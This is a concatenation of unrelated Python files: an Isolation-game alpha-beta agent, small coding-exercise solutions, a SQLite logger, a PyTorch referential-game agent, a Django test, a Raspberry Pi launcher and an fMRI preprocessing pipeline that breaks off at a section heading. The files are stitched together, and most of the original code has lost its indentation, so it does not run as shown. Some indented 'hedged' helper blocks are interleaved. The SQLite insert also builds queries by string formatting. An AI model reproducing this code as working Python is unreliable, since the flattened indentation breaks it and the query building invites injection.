opp_score = knight_heuristic(game, game.get_player_location(game.get_opponent(player)))
if my_score > opp_score:
return float('inf')
else:
return float('-inf')
else:
own_moves = len(game.get_legal_moves(player))
opp_moves = len(game.get_legal_moves(game.get_opponent(player)))
return float(own_moves - opp_moves)
custom_score = knight_only_score
custom_score_2 = real_steps_score
custom_score_3 = combined_score
class IsolationPlayer:
"""Base class for minimax and alphabeta agents -- this class is never
constructed or tested directly.
******************** DO NOT MODIFY THIS CLASS ********************
Parameters
----------
search_depth : int (optional)
A strictly positive integer (i.e., 1, 2, 3,...) for the number of
layers in the game tree to explore for fixed-depth search. (i.e., a
depth of one (1) would only explore the immediate successors of the
current state.)
score_fn : callable (optional)
A function to use for heuristic evaluation of game states.
timeout : float (optional)
Time remaining (in milliseconds) when search is aborted. Should be a
positive value large enough to allow the function to return before the
timer expires.
"""
def __init__(self, search_depth=3, score_fn=custom_score, timeout=10.):
self.search_depth = search_depth
self.score = score_fn
self.time_left = None
self.TIMER_THRESHOLD = timeout
class MinimaxPlayer(IsolationPlayer):
"""Game-playing agent that chooses a move using depth-limited minimax
search. You must finish and test this player to make sure it properly uses
minimax to return a good move before the search time limit expires.
"""
def get_move(self, game, time_left):
"""Search for the best move from the available legal moves and return a
result before the time limit expires.
************** YOU DO NOT NEED TO MODIFY THIS FUNCTION *************
For fixed-depth search, this function simply wraps the call to the
minimax method, but this method provides a common interface for all
Isolation agents, and you will replace it in the AlphaBetaPlayer with
iterative deepening search.
Parameters
----------
game : `isolation.Board`
An instance of `isolation.Board` encoding the current state of the
game (e.g., player locations and blocked cells).
time_left : callable
A function that returns the number of milliseconds left in the
current turn. Returning with any less than 0 ms remaining forfeits
the game.
Returns
-------
(int, int)
Board coordinates corresponding to a legal move; may return
(-1, -1) if there are no available legal moves.
"""
self.time_left = time_left
# Initialize the best move so that this function returns something
# in case the search fails due to timeout
best_move = (-1, -1)
try:
# The try/except block will automatically catch the exception
# raised when the timer is about to expire.
return self.minimax(game, self.search_depth)
except SearchTimeout:
pass # Handle any actions required after timeout as needed
# Return the best move from the last completed search iteration
return best_move
def minimax(self, game, depth):
"""Implement depth-limited minimax search algorithm as described in
the lectures.
This should be a modified version of MINIMAX-DECISION in the AIMA text.
https://github.com/aimacode/aima-pseudocode/blob/master/md/Minimax-Decision.md
**********************************************************************
You MAY add additional methods to this class, or define helper
functions to implement the required functionality.
**********************************************************************
Parameters
----------
game : isolation.Board
An instance of the Isolation game `Board` class representing the
current game state
depth : int
Depth is an integer representing the maximum number of plies to
search in the game tree before aborting
Returns
-------
(int, int)
The board coordinates of the best move found in the current search;
(-1, -1) if there are no legal moves
Notes
-----
(1) You MUST use the `self.score()` method for board evaluation
to pass the project tests; you cannot call any other evaluation
function directly.
(2) If you use any helper functions (e.g., as shown in the AIMA
pseudocode) then you must copy the timer check into the top of
each helper function or else your agent will timeout during
testing.
"""
if self.time_left() < self.TIMER_THRESHOLD:
raise SearchTimeout()
(score, best_move) = self.minimax_with_score(game, depth, True)
return best_move
def minimax_with_score(self, game, depth, maximizing_player=True):
"""Implement the minimax search algorithm as described in the lectures.
Parameters
----------
game : isolation.Board
An instance of the Isolation game `Board` class representing the
current game state
depth : int
Depth is an integer representing the maximum number of plies to
search in the game tree before aborting
maximizing_player : bool
Flag indicating whether the current search depth corresponds to a
maximizing layer (True) or a minimizing layer (False)
Returns
-------
float
The score for the current search branch
tuple(int, int)
The best move for the current branch; (-1, -1) for no legal moves
Notes
-----
(1) You MUST use the `self.score()` method for board evaluation
to pass the project unit tests; you cannot call any other
evaluation function directly.
"""
if self.time_left() < self.TIMER_THRESHOLD:
raise SearchTimeout()
# Terminal node
if depth == 0:
score_fn = self.score
return score_fn(game, self), (-1, -1)
# Going to the next level
best_score = float('-inf') if maximizing_player else float('inf')
best_move = (-1, -1)
possible_moves = game.get_legal_moves()
for move in possible_moves:
sub_game = game.forecast_move(move)
sub_score, _ = self.minimax_with_score(sub_game, depth - 1, not maximizing_player)
if maximizing_player:
if sub_score > best_score:
best_move = move
best_score = sub_score
if sub_score == float('inf'):
return best_score, best_move
else:
if sub_score < best_score:
best_move = move
best_score = sub_score
if sub_score == float('-inf'):
return best_score, best_move
return (best_score, best_move)
class AlphaBetaPlayer(IsolationPlayer):
"""Game-playing agent that chooses a move using iterative deepening minimax
search with alpha-beta pruning. You must finish and test this player to
make sure it returns a good move before the search time limit expires.
"""
def get_move(self, game, time_left):
"""Search for the best move from the available legal moves and return a
result before the time limit expires.
Modify the get_move() method from the MinimaxPlayer class to implement
iterative deepening search instead of fixed-depth search.
**********************************************************************
NOTE: If time_left() < 0 when this function returns, the agent will
forfeit the game due to timeout. You must return _before_ the
timer reaches 0.
**********************************************************************
Parameters
----------
game : `isolation.Board`
An instance of `isolation.Board` encoding the current state of the
game (e.g., player locations and blocked cells).
time_left : callable
A function that returns the number of milliseconds left in the
current turn. Returning with any less than 0 ms remaining forfeits
the game.
Returns
-------
(int, int)
Board coordinates corresponding to a legal move; may return
(-1, -1) if there are no available legal moves.
"""
self.time_left = time_left
legal_moves = game.get_legal_moves(game.active_player)
if len(legal_moves) == 0:
return (-1, -1)
best_score, best_move = float("-inf"), legal_moves[0]
try:
max_depth = 1
while True:
if self.time_left() < self.TIMER_THRESHOLD:
raise SearchTimeout()
best_move = self.alphabeta(game, max_depth)
max_depth += 1
except SearchTimeout:
return best_move
return best_move
def alphabeta(self, game, depth, alpha=float("-inf"), beta=float("inf")):
"""Implement depth-limited minimax search with alpha-beta pruning as
described in the lectures.
This should be a modified version of ALPHA-BETA-SEARCH in the AIMA text
https://github.com/aimacode/aima-pseudocode/blob/master/md/Alpha-Beta-Search.md
**********************************************************************
You MAY add additional methods to this class, or define helper
functions to implement the required functionality.
**********************************************************************
Parameters
----------
game : isolation.Board
An instance of the Isolation game `Board` class representing the
current game state
depth : int
Depth is an integer representing the maximum number of plies to
search in the game tree before aborting
alpha : float
Alpha limits the lower bound of search on minimizing layers
beta : float
Beta limits the upper bound of search on maximizing layers
Returns
-------
(int, int)
The board coordinates of the best move found in the current search;
(-1, -1) if there are no legal moves
Notes
-----
(1) You MUST use the `self.score()` method for board evaluation
to pass the project tests; you cannot call any other evaluation
function directly.
(2) If you use any helper functions (e.g., as shown in the AIMA
pseudocode) then you must copy the timer check into the top of
each helper function or else your agent will timeout during
testing.
"""
if self.time_left() < self.TIMER_THRESHOLD:
raise SearchTimeout()
(score, best_move) = self.alphabeta_with_score(game, depth, alpha, beta, True)
return best_move
def alphabeta_with_score(self, game, depth, alpha=float("-inf"), beta=float("inf"), maximizing_player=True):
"""Implement minimax search with alpha-beta pruning as described in the
lectures.
Parameters
----------
game : isolation.Board
An instance of the Isolation game `Board` class representing the
current game state
depth : int
Depth is an integer representing the maximum number of plies to
search in the game tree before aborting
alpha : float
Alpha limits the lower bound of search on minimizing layers
beta : float
Beta limits the upper bound of search on maximizing layers
maximizing_player : bool
Flag indicating whether the current search depth corresponds to a
maximizing layer (True) or a minimizing layer (False)
Returns
-------
float
The score for the current search branch
tuple(int, int)
The best move for the current branch; (-1, -1) for no legal moves
Notes
-----
(1) You MUST use the `self.score()` method for board evaluation
to pass the project unit tests; you cannot call any other
evaluation function directly.
"""
if self.time_left() < self.TIMER_THRESHOLD:
raise SearchTimeout()
if depth == 0:
score_fn = self.score
return score_fn(game, self), (-1, -1)
if maximizing_player:
best_score, best_move = float('-inf'), (-1, -1)
for move in game.get_legal_moves(self):
sub_game = game.forecast_move(move)
sub_score, _ = self.alphabeta_with_score(sub_game, depth - 1, alpha, beta, False)
if sub_score >= best_score:
best_score, best_move = sub_score, move
alpha = max(alpha, best_score)
if beta <= alpha:
break
else:
best_score, best_move = float('inf'), (-1, -1)
for move in game.get_legal_moves(game.get_opponent(self)):
sub_game = game.forecast_move(move)
sub_score, _ = self.alphabeta_with_score(sub_game, depth - 1, alpha, beta, True)
if sub_score <= best_score:
best_score, best_move = sub_score, move
beta = min(beta, best_score)
if (beta <= alpha):
break
return (best_score, best_move)
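# ---------------------------------------------------------------------------
# Hedged illustration (not part of the original player class): the same
# depth-limited alpha-beta idea on a toy game tree, so the pruning behaviour
# documented above can be checked in isolation. The tree shape and leaf values
# below are invented purely for illustration.
def _toy_alphabeta(node, depth, alpha=float("-inf"), beta=float("inf"), maximizing=True):
    # A node is either a numeric leaf score or a list of child nodes.
    if depth == 0 or not isinstance(node, list):
        return node
    if maximizing:
        best = float("-inf")
        for child in node:
            best = max(best, _toy_alphabeta(child, depth - 1, alpha, beta, False))
            alpha = max(alpha, best)
            if beta <= alpha:
                break  # prune the remaining siblings
        return best
    best = float("inf")
    for child in node:
        best = min(best, _toy_alphabeta(child, depth - 1, alpha, beta, True))
        beta = min(beta, best)
        if beta <= alpha:
            break  # prune the remaining siblings
    return best

if __name__ == "__main__":
    # Root is a MAX node over three MIN nodes; the minimax value is max(3, 6, 1) = 6,
    # and the last leaf (2) is pruned because beta drops to 1 while alpha is already 6.
    assert _toy_alphabeta([[3, 5], [6, 9], [1, 2]], depth=2) == 6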
|
u = int(input())
while u > 0:
n,x,t = map(int,input().split())
start = []
for i in range(n):
start.append(i*x)
#print(start)
end = []
for i in range(n):
end.append(start[i]+t)
#print(end)
stor = []
for k in range(n-1):
a = end[k]
cnt = 0
for j in range(k + 1, n):
if a >= start[j] and a <= end[j]:
cnt+=1
stor.append(cnt)
print(sum(stor))
u = u-1
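# ---------------------------------------------------------------------------
# Hedged note (not part of the original snippet): every interval has length t
# and consecutive starts are x apart, so end[k] falls inside a later interval j
# exactly when (j - k) * x <= t. Assuming x > 0, the quadratic double loop above
# collapses to a closed form per launch; this is a sketch of that O(n) variant.
def count_overlaps(n, x, t):
    m = t // x  # how many of the following intervals end[k] can reach
    return sum(min(m, n - 1 - k) for k in range(n - 1))

assert count_overlaps(3, 2, 5) == 3
assert count_overlaps(4, 3, 3) == 3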
|
import sqlite3 as lite
import sys
def setupTables(name='P50Events.sqlite'):
con=lite.connect(name)
with con:
cur = con.cursor()
cur.execute("CREATE TABLE P50Muon(event INT,pulseTop REAL,pulseBot REAL,renormTop REAL,renormBot REAL,length REAL,time REAL)")
def insertEvent(event,pulseTop,pulseBot,renormTop,renormBot,length,time,name='P50Events.sqlite',table='P50Muon') :
con=lite.connect(name)
with con:
cmd="INSERT INTO %s VALUES(%d,%f,%f,%f,%f,%f,%f)" %(table,event,pulseTop,pulseBot,renormTop,renormBot,length,time)
# print cmd
cur = con.cursor()
cur.execute(cmd)
# def addCol(name,Type,table='P50Muon'):
# cmd="ALTER TABLE %s ADD COLUMN %s %s " %(table,name,Type)
# print cmd
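# ---------------------------------------------------------------------------
# Hedged sketch (not part of the original file): insertEvent builds its SQL with
# % string formatting; sqlite3 also accepts "?" placeholders for the values,
# which sidesteps quoting and formatting issues. Only the table name still has
# to be interpolated, because identifiers cannot be parameterized.
def insertEventSafe(event, pulseTop, pulseBot, renormTop, renormBot, length,
                    time, name='P50Events.sqlite', table='P50Muon'):
    con = lite.connect(name)
    with con:
        cur = con.cursor()
        cmd = "INSERT INTO %s VALUES(?,?,?,?,?,?,?)" % table
        cur.execute(cmd, (event, pulseTop, pulseBot, renormTop,
                          renormBot, length, time))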
|
class Solution(object):
def findTilt(self, root):
self.total = 0
def addtraverse(root):
if not root:
return 0
l = r = 0
if root.left:
l = addtraverse(root.left)
if root.right:
r = addtraverse(root.right)
self.total += abs(l-r)
return l + r + root.val
addtraverse(root)
return self.total
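# ---------------------------------------------------------------------------
# Hedged usage sketch (the TreeNode class below is assumed; on LeetCode it is
# provided by the judge). For a root of 1 with children 2 and 3, the only
# non-zero tilt is at the root, |2 - 3| = 1.
class TreeNode(object):
    def __init__(self, val=0, left=None, right=None):
        self.val, self.left, self.right = val, left, right

if __name__ == "__main__":
    root = TreeNode(1, TreeNode(2), TreeNode(3))
    assert Solution().findTilt(root) == 1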
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.distributions import Categorical
import os
from model_utils import RnnEncoder
from model_utils import TwoLayerMLP
from vision import Vision
from amdim.model import Model
class Agent(nn.Module):
def __init__(self, agent_hps=None, vision_hps=None):
super(Agent, self).__init__()
# agent hps
self.hidden_size = agent_hps["hidden_size"]
self.vocab_size = agent_hps["vocab_size"]
self.emb_size = agent_hps["emb_size"]
self.message_length = agent_hps["message_length"]
# shared embedding layer
self.shared_embedding = nn.Embedding(self.vocab_size, self.emb_size)
self.sos_embedding = nn.Parameter(torch.zeros(self.emb_size))
# shared vision + linear layers
self.input_channels = vision_hps["input_channels"]
self.vision_ckpt = vision_hps["vision_ckpt"]
self.vision = Vision(self.input_channels)
self.fc = nn.Linear(576, self.hidden_size)
# sender modules
self.sender_decoder = nn.LSTMCell(self.emb_size, self.hidden_size)
self.sender_hidden_to_output = nn.Linear(self.hidden_size, self.vocab_size)
# receiver modules
self.receiver_encoder = RnnEncoder(self.vocab_size, self.shared_embedding, self.hidden_size, "lstm")
def forward(self, mode, **kwargs):
if mode == "sender":
output = self.sender_forward(tgt_img=kwargs["tgt_img"]) # message
elif mode == "receiver":
output = self.receiver_forward(imgs=kwargs["imgs"], message=kwargs["message"]) # prediction
return output
def sender_forward(self, tgt_img):
enc_outputs = self.vision(tgt_img)
feature_vector = enc_outputs.view(enc_outputs.size(0), -1) # b * features
ht = self.fc(feature_vector) # b x hidden_size
ct = torch.zeros_like(ht)
et = torch.stack([self.sos_embedding] * ht.size(0))
message = []
log_probs = []
entropy = []
for i in range(self.message_length - 1):
ht, ct = self.sender_decoder(et, (ht, ct))
step_probs = F.softmax(self.sender_hidden_to_output(ht), dim=1)  # probabilities over the vocabulary
distr = Categorical(probs=step_probs)
if self.training:
token = distr.sample()
else:
token = step_probs.argmax(dim=1)
et = self.shared_embedding(token)
message.append(token)
log_probs.append(distr.log_prob(token))
entropy.append(distr.entropy())
message = torch.stack(message).permute(1, 0)
log_probs = torch.stack(log_probs).permute(1, 0)
entropy = torch.stack(entropy).permute(1, 0)
zeros = torch.zeros((message.size(0), 1)).to(message.device)
message = torch.cat([message, zeros.long()], dim=1)
log_probs = torch.cat([log_probs, zeros], dim=1)
entropy = torch.cat([entropy, zeros], dim=1)
return message, log_probs, entropy
def receiver_forward(self, message, imgs):
batch_size = message.size(0)
num_imgs = imgs.size(1)
imgs = imgs.view(batch_size*num_imgs, self.input_channels, 64, 64)
enc_outputs = self.vision(imgs)
feature_vectors = enc_outputs.view(batch_size*num_imgs, -1) # b*num_imgs * features
feature_vectors = self.fc(feature_vectors) # b*num_imgs * self.hidden_size
feature_vectors = feature_vectors.view(batch_size, num_imgs, -1) # b x num_imgs x hidden_size
emb_msg = self.receiver_encoder(message).unsqueeze(1)
img_msg = torch.Tensor([]).to(feature_vectors.device)
for i in range(num_imgs):
# compute img/message similarity score
img_msg = torch.cat((img_msg, torch.bmm(feature_vectors[:, i, :].unsqueeze(1), torch.transpose(emb_msg, 2, 1))), 1)
probs = F.softmax(img_msg, 1).squeeze(-1)
distr = Categorical(probs=probs)
if self.training:
choice = distr.sample()
else:
choice = probs.argmax(dim=1)
log_probs = distr.log_prob(choice)
entropy = None
return choice, log_probs, entropy
def load_vision(self):
ckpt = torch.load(self.vision_ckpt)
hp = ckpt["hyperparams"]
params = ckpt["model"]
model = Model(ndf=hp["ndf"], n_classes=hp["n_classes"], n_rkhs=hp["n_rkhs"],
n_depth=hp["n_depth"], encoder_size=hp["encoder_size"])
model.load_state_dict(params)
self.vision = model.encoder
print("Loaded checkpoint from {:s}.".format(self.vision_ckpt))
|
from colossus.apps.campaigns.tests.factories import (
CampaignFactory, EmailFactory, LinkFactory,
)
from colossus.apps.subscribers.activities import render_activity
from colossus.apps.subscribers.constants import ActivityTypes
from colossus.apps.subscribers.tests.factories import ActivityFactory
from colossus.test.testcases import TestCase
class RenderActivityTests(TestCase):
def setUp(self):
self.campaign = CampaignFactory()
self.email = EmailFactory(campaign=self.campaign)
self.link = LinkFactory(email=self.email)
def test_render_activity_without_renderer(self):
"""
Test that the render_activity function handles all keys in ActivityTypes.
If a new key is added to ActivityTypes and render_activity is not aware of it, this test
will fail by raising a KeyError exception.
"""
for activity_type in ActivityTypes.LABELS.keys():
with self.subTest(activity_type=activity_type):
activity = ActivityFactory(activity_type=activity_type, email=self.email, link=self.link)
activity.activity_type = activity_type
self.assertNotEqual('', render_activity(activity))
|
#!/usr/bin/env python3
import subprocess
import os
p1 = subprocess.Popen(["/usr/local/bin/processing-java", "--sketch=/home/pi/pi_cube/main", "--run"])
os.chdir("/home/pi/pi_cube/sol")
p2 = subprocess.Popen(["python3", "sol.py"])
try:
p1.wait()
p2.wait()
except KeyboardInterrupt:
try:
p1.terminate()
p2.terminate()
except OSError:
pass
p1.wait()
p2.wait()
|
# coding: utf-8
# ### Preprocessing Pipeline
# 1. Create a BIDSDataGrabber Node to read data files
# 2. Create a IdentityInterface - infosource Node to iterate over multiple Subjects
# 3. Create following Nodes for preprocessing
# - [x] Exclude 4 volumes from the functional scan
# - [x] slice time correction
# - [x] motion correction and saving the motion parameters
# - [x] Registration of functional data to anatomical and anatomical to standard space to create
# transformation matrices.
# - [x] Registering the atlas to the functional space
from bids.grabbids import BIDSLayout
from nipype.interfaces.fsl import (BET, ExtractROI, FAST, FLIRT, ImageMaths,
MCFLIRT, SliceTimer, Threshold,Info, ConvertXFM,MotionOutliers)
from nipype.interfaces.afni import Resample
from nipype.interfaces.io import DataSink
from nipype.pipeline import Node, MapNode, Workflow, JoinNode
from nipype.interfaces.utility import IdentityInterface, Function
import os
from os.path import join as opj
from nipype.interfaces import afni
import nibabel as nib
import json
from confounds import wf_main_for_masks as wfm
from confounds import wf_tissue_priors as wftp
# import logging
#
# logger = logging.getLogger(__name__)
# logger.setLevel(logging.DEBUG)
#
# # create a file handler
# handler = logging.FileHandler('progress.log')
#
# # add the handlers to the logger
# logger.addHandler(handler)
# Paths
# path_cwd = os.getcwd()
# path_split_list = path_cwd.split('/')
# s = path_split_list[0:-1] # for getting to the parent dir of pwd
# s = opj('/',*s) # *s converts list to path, # very important to add '/' in the begining so it is read as directory later
#
#
# # json_path = opj(data_directory,'task-rest_bold.json')
#
# json_path = 'scripts/json/paths.json'
# with open(json_path, 'rt') as fp:
# task_info = json.load(fp)
#
#
#
# # In[851]:
#
#
# base_directory = opj(s,task_info["base_directory_for_results"])
# parent_wf_directory = task_info["parent_wf_directory"]
# motion_correction_bet_directory = task_info["motion_correction_bet_directory"]
# coreg_reg_directory = task_info["coreg_reg_directory"]
# atlas_resize_reg_directory = task_info["atlas_resize_reg_directory"]
# data_directory = opj(s,task_info["data_directory"])
# datasink_name = task_info["datasink_name"]
#
# atlasPath = opj(s,task_info["atlas_path"])
#
# layout = BIDSLayout(data_directory)
#
# # number_of_subjects = 4 # Number of subjects you wish to preprocess
#
# subject_list = (layout.get_subjects())[0:number_of_subjects]
def main(paths, options_binary_string, ANAT , DO_FAST=False, num_proc = 7):
json_path=paths['json_path']
base_directory=paths['base_directory']
motion_correction_bet_directory=paths['motion_correction_bet_directory']
parent_wf_directory=paths['parent_wf_directory']
# functional_connectivity_directory=paths[4]
coreg_reg_directory=paths['coreg_reg_directory']
atlas_resize_reg_directory=paths['atlas_resize_reg_directory']
subject_list = paths['subject_list']
datasink_name=paths['datasink_name']
# fc_datasink_name=paths[9]
atlasPath=paths['atlasPath']
# brain_path=paths[11]
# mask_path=paths[12]
# atlas_path=paths[13]
# tr_path=paths[14]
# motion_params_path=paths[15]
# func2std_mat_path=paths[16]
# MNI3mm_path=paths[17]
# demographics_file_path = paths[18]
# phenotype_file_path = paths[19]
data_directory = paths['data_directory']
number_of_subjects = len(subject_list)
print("Working with ",number_of_subjects," subjects.")
# Options:
# discard 4 Volumes (extract), slicetimer, mcflirt
print('Preprocessing Options:')
print('Skipping 4 dummy volumes - ',options_binary_string[0])
print('Slicetiming correction - ',options_binary_string[1])
print('Finding Motion Outliers - ',options_binary_string[2])
print('Doing Motion Correction - ',options_binary_string[3])
motionOutliersOption = options_binary_string[2]
# Create our own custom function - BIDSDataGrabber using a Function Interface.
# In[858]:
def get_nifti_filenames(subject_id,data_dir):
# Remember that all the necessary imports need to be INSIDE the function for the Function Interface to work!
from bids.grabbids import BIDSLayout
layout = BIDSLayout(data_dir) # TODO takes lot of time to execute. Move it out in the next version
# DEBUG Tried moving out. gave deep copy error..
run = 1
session = 1
if session != 0:
anat_file_path = [f.filename for f in layout.get(subject=subject_id, type='T1w', session = session, run=run, extensions=['nii', 'nii.gz'])]
func_file_path = [f.filename for f in layout.get(subject=subject_id, type='bold',session = session, run=run, extensions=['nii', 'nii.gz'])]
else:
anat_file_path = [f.filename for f in layout.get(subject=subject_id, type='T1w' , extensions=['nii', 'nii.gz'])]
func_file_path = [f.filename for f in layout.get(subject=subject_id, type='bold', run=run, extensions=['nii', 'nii.gz'])]
if len(func_file_path) == 0:
print('Error with subject ID %s' % subject_id )
raise Exception('No Functional File with subject ID %s' % subject_id)
if len(anat_file_path) == 0:
return None, func_file_path[0] # No Anatomical files present
return anat_file_path[0],func_file_path[0]
BIDSDataGrabber = Node(Function(function=get_nifti_filenames, input_names=['subject_id','data_dir'],
output_names=['anat_file_path','func_file_path']), name='BIDSDataGrabber')
# BIDSDataGrabber.iterables = [('subject_id',subject_list)]
BIDSDataGrabber.inputs.data_dir = data_directory
# ## Return TR
# def get_TR(in_file):
# from bids.grabbids import BIDSLayout
# import json
#
# json_path = 'scripts/json/paths.json'
#
# with open(json_path, 'rt') as fp:
# task_info = json.load(fp)
# data_directory = task_info["data_directory"]
#
#
# # data_directory = '/home1/shared/ABIDE_1/UM_1'
# layout = BIDSLayout(data_directory)
# metadata = layout.get_metadata(path=in_file)
# TR = metadata['RepetitionTime']
# return TR
# ---------------- Added new Node to return TR and other slice timing correction params-------------------------------
def _getMetadata(in_file, data_directory):
from bids.grabbids import BIDSLayout
import json
# json_path = 'scripts/json/paths.json'
#
# with open(json_path, 'rt') as fp:
# task_info = json.load(fp)
# data_directory = task_info["data_directory"]
# import logging
#
# logger = logging.getLogger(__name__)
# logger.setLevel(logging.DEBUG)
#
# # create a file handler
# handler = logging.FileHandler('progress.log')
#
# # add the handlers to the logger
# logger.addHandler(handler)
interleaved = True
index_dir = False
# data_directory = '/mnt/project1/home1/varunk/data/ABIDE2RawDataBIDS'
# data_directory = '/home1/shared/ABIDE_1/UM_1'
layout = BIDSLayout(data_directory)
metadata = layout.get_metadata(path=in_file)
print(metadata)
try: tr = metadata['RepetitionTime']
except KeyError:
print('Key RepetitionTime not found in task-rest_bold.json so using a default of 2.0 ')
tr = 2
try: slice_order = metadata['SliceAcquisitionOrder']
except KeyError:
print('Key SliceAcquisitionOrder not found in task-rest_bold.json so using a default of interleaved ascending ')
return tr, index_dir, interleaved
if slice_order.split(' ')[0] == 'Sequential':
interleaved = False
if slice_order.split(' ')[1] == 'Descending':
index_dir = True
return tr, index_dir, interleaved
getMetadata = Node(Function(function=_getMetadata, input_names=['in_file','data_directory'],
output_names=['tr','index_dir','interleaved']), name='getMetadata')
getMetadata.inputs.data_directory = data_directory
# ### Skipping 4 starting scans
# Extract ROI for skipping first 4 scans of the functional data
# > **Arguments:**
# t_min: (corresponds to time dimension) Denotes the starting time of the inclusion
# t_size: Denotes the number of scans to include
#
# The logic behind skipping 4 initial scans is to take scans after the subject has stabilized in the scanner.
# In[863]:
# ExtractROI - skip dummy scans
extract = Node(ExtractROI(t_min=4, t_size=-1, output_type='NIFTI'),
name="extract")
# ### Slice time correction
# Created a Node that does slice time correction
# > **Arguments**:
# index_dir=False -> Slices were taken bottom to top i.e. in ascending order
# interleaved=True means slices were acquired in an interleaved order (e.g., odd slices first, then even, or vice versa)
slicetimer = Node(SliceTimer(
output_type='NIFTI'
),
name="slicetimer")
# ### Motion Correction
# Motion correction is done using FSL's MCFLIRT. It aligns all the volumes of a functional scan to a reference volume (the mean image here, since mean_vol=True)
# MCFLIRT - motion correction
mcflirt = Node(MCFLIRT( mean_vol=True,
save_plots=True,
output_type='NIFTI'),
name="mcflirt")
# Just a dummy node to transfer the output of MCFLIRT to the next workflow. Needed so the pipeline still works if we didn't want to use MCFLIRT
from_mcflirt = Node(IdentityInterface(fields=['in_file']),
name="from_mcflirt")
# ### Skull stripping
# I used FSL's BET
# In[868]:
skullStrip = Node(BET(mask=False, frac=0.3, robust=True ),name='skullStrip') #
# *Note*: Do not include special characters in ```name``` field above because then wf.write_graph will cause issues
# ## Resample
# I needed to resample the anatomical file from 1mm to 3mm, because registering a 1mm file was taking a huge amount of time.
#
# In[872]:
# Resample - resample anatomy to 3x3x3 voxel resolution
resample_mni = Node(Resample(voxel_size=(3, 3, 3), resample_mode='Cu', # cubic interpolation
outputtype='NIFTI'),
name="resample_mni")
resample_anat = Node(Resample(voxel_size=(3, 3, 3), resample_mode='Cu', # cubic interpolation
outputtype='NIFTI'),
name="resample_anat")
# In[873]:
resample_atlas = Node(Resample(voxel_size=(3, 3, 3), resample_mode='NN', # nearest-neighbour interpolation (preserves atlas labels)
outputtype='NIFTI'),
name="resample_atlas")
resample_atlas.inputs.in_file = atlasPath
# # Matrix operations
# ### For concatenating the transformation matrices
concat_xform = Node(ConvertXFM(concat_xfm=True),name='concat_xform')
# Node to calculate the inverse of func2std matrix
inv_mat = Node(ConvertXFM(invert_xfm=True), name='inv_mat')
# ## Extracting the mean brain
meanfunc = Node(interface=ImageMaths(op_string='-Tmean',
suffix='_mean'),
name='meanfunc')
meanfuncmask = Node(interface=BET(mask=True,
no_output=True,
frac=0.3),
name='meanfuncmask')
# ## Apply Mask
# Does BET (masking) on the whole func scan [Not using this, creates bug for join node]
maskfunc = Node(interface=ImageMaths(suffix='_bet',
op_string='-mas'),
name='maskfunc')
# Does BET (masking) on the mean func scan and outputting the mask as well as masked mean functional image
maskfunc4mean = Node(interface=ImageMaths(suffix='_bet',
op_string='-mas'),
name='maskfunc4mean')
# ## Datasink
# I needed to define the structure of what files are saved and where.
# Create DataSink object
dataSink = Node(DataSink(), name='datasink')
# Name of the output folder
dataSink.inputs.base_directory = opj(base_directory,datasink_name)
# Define substitution strings so that the data is similar to BIDS
substitutions = [('_subject_id_', 'sub-'),
('_resample_brain_flirt.nii_brain', ''),
('_roi_st_mcf_flirt.nii_brain_flirt', ''),
('task-rest_run-1_bold_roi_st_mcf.nii','motion_params')
# ('T1w_resample_brain_flirt_sub-0050002_task-rest_run-1_bold_roi_st_mcf_mean_bet_flirt','fun2std')
]
# Feed the substitution strings to the DataSink node
dataSink.inputs.substitutions = substitutions
# ### Apply Mask to functional data
# Mean file of the motion corrected functional scan is sent to
# skullStrip to get just the brain and the mask_image.
# Mask_image is just a binary file (containing 1 where brain is present and 0 where it isn't).
# After getting the mask_image from skullStrip, apply that mask to the aligned
# functional image to extract its brain and remove the skull
# In[889]:
# Function
# in_file: The file on which you want to apply mask
# in_file2 = mask_file: The mask you want to use. Make sure that mask_file has same size as in_file
# out_file : Result of applying mask in in_file -> Gives the path of the output file
def applyMask_func(in_file, in_file2):
import numpy as np
import nibabel as nib
import os
from os.path import join as opj
# convert from unicode to string : u'/tmp/tmp8daO2Q/..' -> '/tmp/tmp8daO2Q/..' i.e. removes the prefix 'u'
mask_file = in_file2
brain_data = nib.load(in_file)
mask_data = nib.load(mask_file)
brain = brain_data.get_data().astype('float32')
mask = mask_data.get_data()
# applying mask by multiplying elementwise to the binary mask
if len(brain.shape) == 3: # Anat file
brain = np.multiply(brain,mask)
elif len(brain.shape) > 3: # Functional File
for t in range(brain.shape[-1]):
brain[:,:,:,t] = np.multiply(brain[:,:,:,t],mask)
else:
pass
# Saving the brain file
path = os.getcwd()
in_file_split_list = in_file.split('/')
in_file_name = in_file_split_list[-1]
out_file = in_file_name + '_brain.nii.gz' # changing name
brain_with_header = nib.Nifti1Image(brain, affine=brain_data.affine,header = brain_data.header)
nib.save(brain_with_header,out_file)
out_file = opj(path,out_file)
out_file2 = in_file2
return out_file, out_file2
# #### Things learnt:
# 1. I found out that whenever a node is executed, its own directory becomes the current directory, and whatever file you create there will be stored in it.
# 2. #from IPython.core.debugger import Tracer; Tracer()() # Debugger doesn't work in nipype
# Wrap the above function inside a Node
# In[890]:
applyMask = Node(Function(function=applyMask_func, input_names=['in_file','in_file2'],
output_names=['out_file','out_file2']), name='applyMask')
# ### Some nodes needed for Co-registration and Normalization
# Node for getting the xformation matrix
func2anat_reg = Node(FLIRT(output_type='NIFTI'), name="func2anat_reg")
# Node for applying xformation matrix to functional data
func2std_xform = Node(FLIRT(output_type='NIFTI',
apply_xfm=True), name="func2std_xform")
# Node for applying xformation matrix to functional data
std2func_xform = Node(FLIRT(output_type='NIFTI',
apply_xfm=True, interp='nearestneighbour'), name="std2func_xform")
# Node for Normalizing/Standardizing the anatomical and getting the xformation matrix
anat2std_reg = Node(FLIRT(output_type='NIFTI'), name="anat2std_reg")
# I wanted to use the MNI file as input to the workflow so I created an Identity
# Node that reads the MNI file path and outputs the same MNI file path.
# Then I connected this node to wherever it was needed.
MNI152_2mm = Node(IdentityInterface(fields=['standard_file','mask_file']),
name="MNI152_2mm")
# Set the mask_file and standard_file input in the Node. This setting sets the input mask_file permanently.
MNI152_2mm.inputs.mask_file = os.path.expandvars('$FSLDIR/data/standard/MNI152_T1_2mm_brain_mask.nii.gz')
MNI152_2mm.inputs.standard_file = os.path.expandvars('$FSLDIR/data/standard/MNI152_T1_2mm_brain.nii.gz')
# MNI152_2mm.inputs.mask_file = '/usr/share/fsl/5.0/data/standard/MNI152_T1_2mm_brain_mask.nii.gz'
# MNI152_2mm.inputs.standard_file = '/usr/share/fsl/5.0/data/standard/MNI152_T1_2mm_brain.nii.gz'
# ## Band Pass Filtering
